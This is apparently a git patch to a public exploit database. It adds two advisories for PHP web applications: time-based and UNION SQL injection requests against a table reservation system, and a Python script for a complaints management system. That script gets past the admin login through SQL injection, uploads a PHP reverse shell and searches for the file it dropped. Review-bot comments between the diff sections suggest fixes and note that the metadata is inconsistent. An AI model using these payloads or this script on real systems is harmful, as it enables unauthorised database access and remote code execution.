From 302d11bcbf035ff7742fe8f06534a9638ddecd8c Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Wed, 4 Nov 2020 05:02:02 +0000
Subject: [PATCH] DB: 2020-11-04
2 changes to exploits/shellcodes
Multi Restaurant Table Reservation System 1.0 - 'table_id' Unauthenticated SQL Injection
Exploit Title: Complaints Report Management System 1.0 - 'username' SQL Injection / Remote Code Execution
---
 exploits/php/webapps/48984.txt | 50 +++++++++++++++++++++++++++++++
 exploits/php/webapps/48985.txt | 54 ++++++++++++++++++++++++++++++++++
 files_exploits.csv | 2 ++
 3 files changed, 106 insertions(+)
 create mode 100644 exploits/php/webapps/48984.txt
 create mode 100644 exploits/php/webapps/48985.txt
diff --git a/exploits/php/webapps/48984.txt b/exploits/php/webapps/48984.txt
new file mode 100644
index 000000000..dcce793f2
--- /dev/null
+++ b/exploits/php/webapps/48984.txt
@@ -0,0 +1,50 @@
+# Title: Multi Restaurant Table Reservation System 1.0 - 'table_id' Unauthenticated SQL Injection
+# Exploit Author: yunaranyancat
+# Date: 02-11-2020
+# Vendor Homepage: www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/tablereservation.zip
+# Version: 1.0
+# Tested On: Ubuntu 18.04 + XAMPP
+
+# Description
+
+The file view-chair-list.php does not perform input validation on the table_id parameter which allows unauthenticated SQL Injection.
+An attacker can send malicious input in the GET request to /dashboard/view-chair-list.php?table_id= to trigger the vulnerability.
+
+# POC N°1 = Time based blind SQLi
+
+GET /TableReservation/dashboard/view-chair-list.php?table_id='+AND+(SELECT+1+FROM+(SELECT(SLEEP(10)))a)--+- HTTP/1.1
+Host: [TARGET IP/URL]
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Upgrade-Insecure-Requests: 1
+Cache-Control: max-age=0
+
+### Server will sleep for 10 seconds before returning the response
+
+# POC N° 2 = UNION based SQLi
+
+### Request (getting current user)
+
+GET /TableReservation/dashboard/view-chair-list.php?table_id=%27%20UNION%20ALL%20SELECT%20CONCAT%280x7176787071%2CIFNULL%28CAST%28CURRENT_USER%28%29%20AS%20NCHAR%29%2C0x20%29%2C0x71716b7071%29%2CNULL%2CNULL--%20- HTTP/1.1
+Host: [TARGET IP/URL]
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Upgrade-Insecure-Requests: 1
+Cache-Control: max-age=0
+Content-Length: 2
+
+### Response
+
+...
+
+Delete Chair
+...
\ No newline at end of file
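Review bot: The advisory stops at the two proofs of concept and gives no remediation, so a vendor or reader has nothing in this file to verify a patch against. A short `# Fix:` line after the `# Tested On` header would close that gap, e.g. `# Fix: pass table_id to the database through a parameterized query instead of building the statement from the raw GET value; the UNION request in POC 2 only works because the value reaches the query unescaped`. It would also help defenders to state what the POCs look like server-side: both carry the payload in the GET query string, which a default web-server access log records verbatim, and POC 1 additionally produces the 10-second response delay the file already describes, which is a usable detection signal.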
diff --git a/exploits/php/webapps/48985.txt b/exploits/php/webapps/48985.txt
new file mode 100644
index 000000000..4705d12ed
--- /dev/null
+++ b/exploits/php/webapps/48985.txt
@@ -0,0 +1,54 @@
+# Exploit Title: Complaints Report Management System 1.0 - 'username' SQL Injection / Remote Code Execution
+# Date: 3-11-2020
+# Exploit Author: mosaaed
+# Vendor Homepage: https://www.sourcecodester.com/php/14566/complaints-report-management-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/complaints-report-management-system.zip
+# Version: 1.0
+# Tested on: Parrot 5.5.17 + Apache 2.4.46
+# CVE ID : N/A
+
+# replace shell.php with your own php reverse shell
+# change [TARGET URL] to target URL or IP address
+# setup your netcat listener for sum good ol shellz
+
+
+
+#!/usr/bin/python3
+
+import requests
+import time
+
+def sqli_admin():
+ s = requests.Session()
+ data = {"username":"admin'or'1'=1#","password":"hacked"}
+ adminlogin = "http://localhost/crms/admin/ajax.php?action=save_settings"
+ s.post(adminlogin,data=data)
+ return s
+
+def trigger_rce(session):
+ starttime = int(time.time())
+ multipart_form_data = {
+ "name": ("cyberscurity"),
+ "email": ("test@test.com"),
+ "contact" : ("+11111111111"),
+ "about" : ("Nothing much about it"),
+ "img" : ("shell.php", open("shell.php", "rb"))
+ }
+ session.post("http://localhost/crms/admin/ajax.php?action=save_settings", files=multipart_form_data)
+ get_shell(starttime-100,starttime+100,session)
+
+
+def get_shell(start,end,session):
+ for i in range(start,end):
+ session.get("http://localhost/crms/admin/assets/uploads/"+str(i)+"_shell.php")
+ response = requests.get ("http://localhost/crms/admin/assets/uploads/"+ str(i) +"_shell.php")
+ if response.status_code == 200:
+ print("http://localhost/crms/admin/assets/uploads/"+str(i)+"_shell.php")
+
+
+def main():
+ session = sqli_admin()
+ trigger_rce(session)
+
+if __name__ == '__main__':
+ main()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 7c8f43cbd..a35570bc9 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
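Review bot: The header comment says to change `[TARGET URL]`, but that placeholder never appears in the code; all three functions hard-code `http://localhost/crms/...` instead, so the usage note does not describe the file it sits in and should read something like `# change the http://localhost/crms/ base URL used in the code to the target URL or IP address`. The file also documents neither root cause nor fix although the code makes both visible: `sqli_admin` bypasses the login with a quote-bearing `username` value, and `trigger_rce` depends on the `img` upload being stored under `admin/assets/uploads/` with its `.php` name intact and, going by the reverse-shell comment, executed when fetched. A `# Fix:` line after `# CVE ID : N/A` — parameterize the login query, validate the uploaded file's extension and content server-side, and keep uploads where PHP is not executed — would make the entry usable for remediation and for confirming a vendor patch. The `# Date: 3-11-2020` line uses a different day format from the 48984 advisory in the same commit; one format across entries would avoid misreads.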
@@ -40802,6 +40802,8 @@ id,file,description,date,author,type,platform,port
 48979,exploits/php/webapps/48979.py,"WordPress Plugin Simple File List 5.4 - Arbitrary File Upload",2020-11-02,H4rk3nz0,webapps,php,
 48980,exploits/php/webapps/48980.py,"Monitorr 1.7.6m - Remote Code Execution (Unauthenticated)",2020-11-02,"Lyhin\'s Lab",webapps,php,
 48981,exploits/php/webapps/48981.py,"Monitorr 1.7.6m - Authorization Bypass",2020-11-02,"Lyhin\'s Lab",webapps,php,
+48984,exploits/php/webapps/48984.txt,"Multi Restaurant Table Reservation System 1.0 - 'table_id' Unauthenticated SQL Injection",2020-11-03,yunaranyancat,webapps,php,
+48985,exploits/php/webapps/48985.txt,"Exploit Title: Complaints Report Management System 1.0 - 'username' SQL Injection / Remote Code Execution",2020-11-03,Mosaaed,webapps,php,
 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,
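Review bot: The description field of the new 48985 row keeps the literal `Exploit Title: ` prefix copied from the advisory header, which no other row in the hunk carries (the 48984 row directly above is in the expected form) and which has already propagated into the commit message; the row should read `48985,exploits/php/webapps/48985.txt,"Complaints Report Management System 1.0 - 'username' SQL Injection / Remote Code Execution",2020-11-03,mosaaed,webapps,php,`. That row also spells the author `Mosaaed` while the advisory's `# Exploit Author:` line gives `mosaaed`, and the 48984 row's date `2020-11-03` does not match that advisory's `# Date: 02-11-2020`; if the date column is meant to hold the advisory date rather than the publication day, both new rows need a second look. Presumably this description string is what listings and searches display, so the stray prefix would surface on every view of the entry.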